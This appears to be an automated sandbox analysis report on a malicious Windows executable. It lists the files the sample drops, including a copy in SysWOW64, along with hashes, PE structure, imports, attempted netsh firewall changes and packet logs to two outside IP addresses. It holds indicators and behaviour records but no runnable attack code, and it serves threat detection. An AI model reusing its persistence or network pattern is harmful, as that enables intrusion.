Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%l,9a.Bja.Bja.Bj._.j\|.Bj._.j..Bj._.jO.BjF.9jb.Bja.Cj..Bj._.j`.Bj._.j`.Bj._.j`.BjRicha.Bj................PE..L......`................. ..........`3.......0....@.............................................................................(.... ...............................1...............................s..@............0...............................text............ .................. ..`.rdata..nY...0...Z...$..............@..@.data...x........"...~..............@....rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\uufaeea:Zone.Identifier Download File
Process:	C:\Windows\explorer.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	unknown
Preview:	[ZoneTransfer]....ZoneId=0

C:\Windows\SysWOW64\shayesoq\lagavljy.exe (copy) Download File
Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	10543104
Entropy (8bit):	6.35786276890293
Encrypted:	false
SSDEEP:	49152:xLORQkvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvP:xLORQ
MD5:	7A36C0AD3083A1519CCE3A67BB377D18
SHA1:	60416774DCA16DAC538703FC0DBF17E9D5F284DA
SHA-256:	B968714F907A742E784710A566FC7178C278C074CAA95C5405D40573F35DBEBC
SHA-512:	D9ACD8081190D480227E1B61FD3C8D7AA85B687AE53AFC90E412CCA158368AC2FEDFE50F62BE25C893F90ED65AE4E22EAFEBBEE352A94680BC8EAC6548170776
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%l,9a.Bja.Bja.Bj._.j\|.Bj._.j..Bj._.jO.BjF.9jb.Bja.Cj..Bj._.j`.Bj._.j`.Bj._.j`.BjRicha.Bj................PE..L....._................. ..."......`3.......0....@..........................@.......7..........................................(....`...............................1...............................s..@............0...............................text............ .................. ..`.rdata..nY...0...Z...$..............@..@.data...x........l...~..............@....rsrc........`......................@..@........................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1572864
Entropy (8bit):	4.236050220640177
Encrypted:	false
SSDEEP:	12288:/+hTI+sxo6OWrn9KBr9JQM7W6EX4gsVhIrSXOMOEplI41x/s:GhTI+sxo6Oun9KtK6
MD5:	3A981F75C79C87C66C2E3C993FB7A1C9
SHA1:	E447E1AB82B13A9649001FA037AEDEA394BFFABF
SHA-256:	83B31472AC406793A71F32EC8192392C190E17B1C2D7D34054D38BB83AE42926
SHA-512:	555E753BD31D48649DF9BD994502ACEE6C1DF21BA8233A5474DA1705453C1C6974B9A09794C6E0ED3132DE8F630B82C5351A06A21EDFD16A1E1F1A28C87FC757
Malicious:	false
Reputation:	unknown
Preview:	regfH...H...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm"{ho..................................................................................................................................................................................................................................................................................................................................................c2........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve.LOG1 Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	3.343015280987901
Encrypted:	false
SSDEEP:	384:fDe5K5pPmKgnVVeeDzeG1NKZtjeT8GVwD35N9M8B:bwKRg/eeDzeoNYtjrGVwDhM8
MD5:	491C1A22271D000AADFD943296472D2C
SHA1:	44B8CF79D15C31CFA752EB16907A33792133108C
SHA-256:	42147A6458BEDAC8A7876F60936731C57A5FB75E195C6A26F5167036C944FC0C
SHA-512:	6568F87D8F49E4AC276EBA782CCE0BE72A99345C65F0EEF985946346559FDBA5A2233BCE24F4898490DFFDD5C915A0E60E26BE8B25FF48B4F635E28521A5F409
Malicious:	false
Reputation:	unknown
Preview:	regfG...G...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm"{ho..................................................................................................................................................................................................................................................................................................................................................c2HvLE.N......G...........p..dE.....O......................... ..hbin................p.\..,..........nk,...jo........ ........................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk ...jo........ ........................... .......Z.......................Root........lf......Root....nk ...jo.................................... ...............*...............DeviceCensus.......................vk..................WritePermissionsCheck.......p...

\Device\ConDrv Download File
Process:	C:\Windows\SysWOW64\netsh.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	3773
Entropy (8bit):	4.7109073551842435
Encrypted:	false
SSDEEP:	48:VHILZNfrI7WFY32iIiNOmV/HToZV9It199hiALlIg39bWA1RvTBi/g2eB:VoLr0y9iIiNOoHTou7bhBlIydWALLt2w
MD5:	DA3247A302D70819F10BCEEBAF400503
SHA1:	2857AA198EE76C86FC929CC3388A56D5FD051844
SHA-256:	5262E1EE394F329CD1F87EA31BA4A396C4A76EDC3A87612A179F81F21606ABC8
SHA-512:	48FFEC059B4E88F21C2AA4049B7D9E303C0C93D1AD771E405827149EDDF986A72EF49C0F6D8B70F5839DCDBD6B1EA8125C8B300134B7F71C47702B577AD090F8
Malicious:	false
Reputation:	unknown
Preview:	..A specified value is not valid.....Usage: add rule name=<string>.. dir=in\|out.. action=allow\|block\|bypass.. [program=<program path>].. [service=<service short name>\|any].. [description=<string>].. [enable=yes\|no (default=yes)].. [profile=public\|private\|domain\|any[,...]].. [localip=any\|<IPv4 address>\|<IPv6 address>\|<subnet>\|<range>\|<list>].. [remoteip=any\|localsubnet\|dns\|dhcp\|wins\|defaultgateway\|.. <IPv4 address>\|<IPv6 address>\|<subnet>\|<range>\|<list>].. [localport=0-65535\|<port range>[,...]\|RPC\|RPC-EPMap\|IPHTTPS\|any (default=any)].. [remoteport=0-65535\|<port range>[,...]\|any (default=any)].. [protocol=0-255\|icmpv4\|icmpv6\|icmpv4:type,code\|icmpv6:type,code\|.. tcp\|udp\|any (default=any)].. [interfacetype=wireless\|lan\|ras\|any].. [rmtcomputergrp=<SDDL string>].. [rmtusrgrp=<SDDL string>].. [edge=yes\|deferapp\|deferuser\|no (default=no)].. [security=authenticate\|authenc\|authdynenc\|authnoencap\|

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.164848187454738
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	U3E7zMaux2.exe
File size:	294400
MD5:	8362e0f91ae3379c73422bbca7bac493
SHA1:	ec761f77bbe9900aed7ffa0a9303dc6801a9effb
SHA256:	adfea20237be615461c44fea423d6043fc74bf1c5303ee33fcecd8acd201291e
SHA512:	a509f836e79276e35ee721aeb596214550e410753a122ce254cb3943eda371713a9fe597717471bc13d884b497d767c393715c4224777f725c4f3ebed9286cab
SSDEEP:	3072:Uv7CHCUfMX34IHHW1UJNZoVkzUl1V9gALVggjcGkNIVqI:UvByIIIW1UJNZo/VV7ITsq
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%l,9a.Bja.Bja.Bj._.j\|.Bj._.j..Bj._.jO.BjF.9jb.Bja.Cj..Bj._.j`.Bj._.j`.Bj._.j`.BjRicha.Bj................PE..L......`...........

File Icon


Icon Hash:	acec36b6b694c6e2

Static PE Info

General
Entrypoint:	0x403360
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
DLL Characteristics:	TERMINAL_SERVER_AWARE, NX_COMPAT
Time Stamp:	0x60A40BAC [Tue May 18 18:47:08 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	996fe7decbf39b8813e0892e829e72ad

Entrypoint Preview

Instruction
call 00007FAFC073B26Ch
jmp 00007FAFC073557Dh
int3
int3
int3
int3
int3
int3
mov ecx, dword ptr [esp+04h]
test ecx, 00000003h
je 00007FAFC0735726h
mov al, byte ptr [ecx]
add ecx, 01h
test al, al
je 00007FAFC0735750h
test ecx, 00000003h
jne 00007FAFC07356F1h
add eax, 00000000h
lea esp, dword ptr [esp+00000000h]
lea esp, dword ptr [esp+00000000h]
mov eax, dword ptr [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, FFFFFFFFh
xor eax, edx
add ecx, 04h
test eax, 81010100h
je 00007FAFC07356EAh
mov eax, dword ptr [ecx-04h]
test al, al
je 00007FAFC0735734h
test ah, ah
je 00007FAFC0735726h
test eax, 00FF0000h
je 00007FAFC0735715h
test eax, FF000000h
je 00007FAFC0735704h
jmp 00007FAFC07356CFh
lea eax, dword ptr [ecx-01h]
mov ecx, dword ptr [esp+04h]
sub eax, ecx
ret
lea eax, dword ptr [ecx-02h]
mov ecx, dword ptr [esp+04h]
sub eax, ecx
ret
lea eax, dword ptr [ecx-03h]
mov ecx, dword ptr [esp+04h]
sub eax, ecx
ret
lea eax, dword ptr [ecx-04h]
mov ecx, dword ptr [esp+04h]
sub eax, ecx
ret
mov edi, edi
push ebp
mov ebp, esp
sub esp, 20h
mov eax, dword ptr [ebp+08h]
push esi
push edi
push 00000008h
pop ecx
mov esi, 0041328Ch
lea edi, dword ptr [ebp-20h]
rep movsd
mov dword ptr [ebp-08h], eax
mov eax, dword ptr [ebp+0Ch]
pop edi
mov dword ptr [ebp-04h], eax
pop esi
test eax, eax
je 00007FAFC073570Eh
test byte ptr [eax], 00000008h

Rich Headers

Programming Language:

[ C ] VS2008 build 21022
[LNK] VS2008 build 21022
[ASM] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[C++] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x18088	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x42000	0xdc88	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x131e0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x17388	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x13000	0x18c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x11fc6	0x12000	False	0.612263997396	data	6.70078106144	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x13000	0x596e	0x5a00	False	0.457204861111	data	5.66671030744	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x19000	0x28278	0x22200	False	0.254006410256	data	2.80829340035	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x42000	0xdc88	0xde00	False	0.68262598536	data	6.37784764366	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_CURSOR	0x4eff0	0x130	data	Bulgarian	Bulgaria
RT_ICON	0x425d0	0xea8	data	Bulgarian	Bulgaria
RT_ICON	0x43478	0x8a8	data	Bulgarian	Bulgaria
RT_ICON	0x43d20	0x6c8	data	Bulgarian	Bulgaria
RT_ICON	0x443e8	0x568	GLS_BINARY_LSB_FIRST	Bulgarian	Bulgaria
RT_ICON	0x44950	0x25a8	data	Bulgarian	Bulgaria
RT_ICON	0x46ef8	0x10a8	data	Bulgarian	Bulgaria
RT_ICON	0x47fa0	0x988	data	Bulgarian	Bulgaria
RT_ICON	0x48928	0x468	GLS_BINARY_LSB_FIRST	Bulgarian	Bulgaria
RT_ICON	0x48e08	0xea8	data	Bulgarian	Bulgaria
RT_ICON	0x49cb0	0x8a8	data	Bulgarian	Bulgaria
RT_ICON	0x4a558	0x568	GLS_BINARY_LSB_FIRST	Bulgarian	Bulgaria
RT_ICON	0x4aac0	0x25a8	data	Bulgarian	Bulgaria
RT_ICON	0x4d068	0x10a8	data	Bulgarian	Bulgaria
RT_ICON	0x4e110	0x988	data	Bulgarian	Bulgaria
RT_ICON	0x4ea98	0x468	GLS_BINARY_LSB_FIRST	Bulgarian	Bulgaria
RT_DIALOG	0x4f2f0	0x72	data	Bulgarian	Bulgaria
RT_STRING	0x4f368	0x452	data	Bulgarian	Bulgaria
RT_STRING	0x4f7c0	0x1ec	data	Bulgarian	Bulgaria
RT_STRING	0x4f9b0	0x2d4	data	Bulgarian	Bulgaria
RT_ACCELERATOR	0x4ef68	0x60	data	Bulgarian	Bulgaria
RT_ACCELERATOR	0x4efc8	0x28	data	Bulgarian	Bulgaria
RT_GROUP_CURSOR	0x4f120	0x14	data	Bulgarian	Bulgaria
RT_GROUP_ICON	0x48d90	0x76	data	Bulgarian	Bulgaria
RT_GROUP_ICON	0x4ef00	0x68	data	Bulgarian	Bulgaria
RT_VERSION	0x4f138	0x1b8	COM executable for DOS	Bulgarian	Bulgaria

Imports

DLL

Import

KERNEL32.dll

SetLocaleInfoA, GetConsoleAliasesLengthW, VirtualQuery, GetDefaultCommConfigW, OpenJobObjectA, ReadConsoleA, GetConsoleAliasA, InterlockedDecrement, GetProfileSectionA, SetComputerNameW, GetTimeFormatA, GetConsoleAliasesA, GetConsoleTitleA, SetFileTime, FindResourceExA, Sleep, GetFileAttributesW, SetComputerNameExW, RaiseException, GetLongPathNameW, GetProcAddress, VirtualAlloc, GetAtomNameA, LocalAlloc, DnsHostnameToComputerNameA, GetFileType, GetModuleFileNameA, CreateIoCompletionPort, SetConsoleTitleW, GetModuleHandleA, GetStringTypeW, GetVersionExA, ReadConsoleInputW, EnumSystemLocalesW, CreateThread, HeapAlloc, GetCommandLineA, GetStartupInfoA, RtlUnwind, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetLastError, HeapFree, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, VirtualFree, HeapReAlloc, HeapCreate, GetModuleHandleW, ExitProcess, WriteFile, GetStdHandle, SetHandleCount, SetFilePointer, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, CloseHandle, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, InitializeCriticalSectionAndSpinCount, LoadLibraryA, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, CreateFileA, SetStdHandle, GetConsoleCP, GetConsoleMode, FlushFileBuffers, HeapSize, GetLocaleInfoA, LCMapStringA, MultiByteToWideChar, LCMapStringW, GetStringTypeA, SetEndOfFile, GetProcessHeap, ReadFile, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW

Version Infos

Description	Data
ProjectVersion	3.10.70.57
InternationalName	bomgvioci.iwa
Copyright	Copyrighz (C) 2021, fudkort
Translation	0x0129 0x0794

Possible Origin

Language of compilation system	Country where language is spoken	Map
Bulgarian	Bulgaria

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 14, 2022 00:15:08.470151901 CET	49778	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:08.521605015 CET	80	49778	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:08.521702051 CET	49778	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:08.521838903 CET	49778	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:08.521861076 CET	49778	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:08.573570967 CET	80	49778	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:08.573594093 CET	80	49778	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:08.603110075 CET	80	49778	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:08.603188038 CET	49778	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:08.604227066 CET	49778	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:08.656111956 CET	80	49778	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:08.927566051 CET	49779	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:08.977960110 CET	80	49779	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:08.978058100 CET	49779	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:08.978221893 CET	49779	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:08.978235960 CET	49779	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:09.029314041 CET	80	49779	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:09.060883045 CET	80	49779	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:09.064419985 CET	49779	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:09.064462900 CET	49779	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:09.115184069 CET	80	49779	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:09.402857065 CET	49780	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:09.453427076 CET	80	49780	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:09.454916954 CET	49780	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:09.455013990 CET	49780	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:09.455030918 CET	49780	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:09.505327940 CET	80	49780	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:09.534573078 CET	80	49780	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:09.534755945 CET	49780	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:09.540623903 CET	49780	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:09.576316118 CET	49781	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:09.590818882 CET	80	49780	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:09.626808882 CET	80	49781	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:09.629986048 CET	49781	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:09.630038977 CET	49781	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:09.630049944 CET	49781	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:09.680416107 CET	80	49781	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:09.713572979 CET	80	49781	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:09.713860035 CET	49781	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:09.714227915 CET	49781	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:09.764363050 CET	80	49781	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:10.040339947 CET	49782	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:10.092287064 CET	80	49782	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:10.092402935 CET	49782	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:10.092550993 CET	49782	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:10.092581987 CET	49782	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:10.144453049 CET	80	49782	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:10.174699068 CET	80	49782	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:10.174803019 CET	49782	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:10.175084114 CET	49782	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:10.226660967 CET	80	49782	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:10.474669933 CET	49783	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:10.525158882 CET	80	49783	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:10.525341034 CET	49783	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:10.525396109 CET	49783	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:10.525404930 CET	49783	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:10.575768948 CET	80	49783	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:10.606343031 CET	80	49783	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:10.606437922 CET	49783	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:10.606723070 CET	49783	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:10.614815950 CET	49784	80	192.168.2.4	185.186.142.166
Jan 14, 2022 00:15:10.656753063 CET	80	49783	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:10.671371937 CET	80	49784	185.186.142.166	192.168.2.4
Jan 14, 2022 00:15:11.175755024 CET	49784	80	192.168.2.4	185.186.142.166
Jan 14, 2022 00:15:11.232177019 CET	80	49784	185.186.142.166	192.168.2.4
Jan 14, 2022 00:15:11.738311052 CET	49784	80	192.168.2.4	185.186.142.166
Jan 14, 2022 00:15:11.795569897 CET	80	49784	185.186.142.166	192.168.2.4
Jan 14, 2022 00:15:12.091588974 CET	49785	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.142396927 CET	80	49785	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.142576933 CET	49785	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.142690897 CET	49785	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.142770052 CET	49785	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.193290949 CET	80	49785	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.222579956 CET	80	49785	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.222661972 CET	49785	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.223427057 CET	49785	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.253673077 CET	49786	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.274051905 CET	80	49785	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.305795908 CET	80	49786	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.305911064 CET	49786	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.306103945 CET	49786	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.306129932 CET	49786	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.358078957 CET	80	49786	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.404050112 CET	80	49786	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.406548977 CET	49786	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.406733990 CET	49786	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.447854996 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.458678007 CET	80	49786	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.498548031 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.499403954 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.499583960 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.558315992 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.558408022 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.558480978 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.558494091 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.558552980 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.558619022 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.558624983 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.558769941 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.558840990 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.558907032 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.558912039 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.558983088 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.559041023 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.559053898 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.559370041 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.609338045 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.609395981 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.609441996 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.609487057 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.609494925 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.609545946 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.609568119 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.609596968 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.609654903 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.609673023 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.609721899 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.609790087 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.609843016 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.609878063 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.609908104 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.609950066 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.610001087 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.610052109 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.610100985 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.610115051 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.610152006 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.610157967 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.610202074 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.610254049 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.610302925 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.610316038 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.610352993 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.610366106 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.610403061 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.610460997 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.660983086 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.661063910 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.661128998 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.661190033 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.661241055 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.661257982 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.661282063 CET	49787	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:12.661319971 CET	80	49787	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:12.661381006 CET	80	49787	93.189.42.167	192.168.2.4
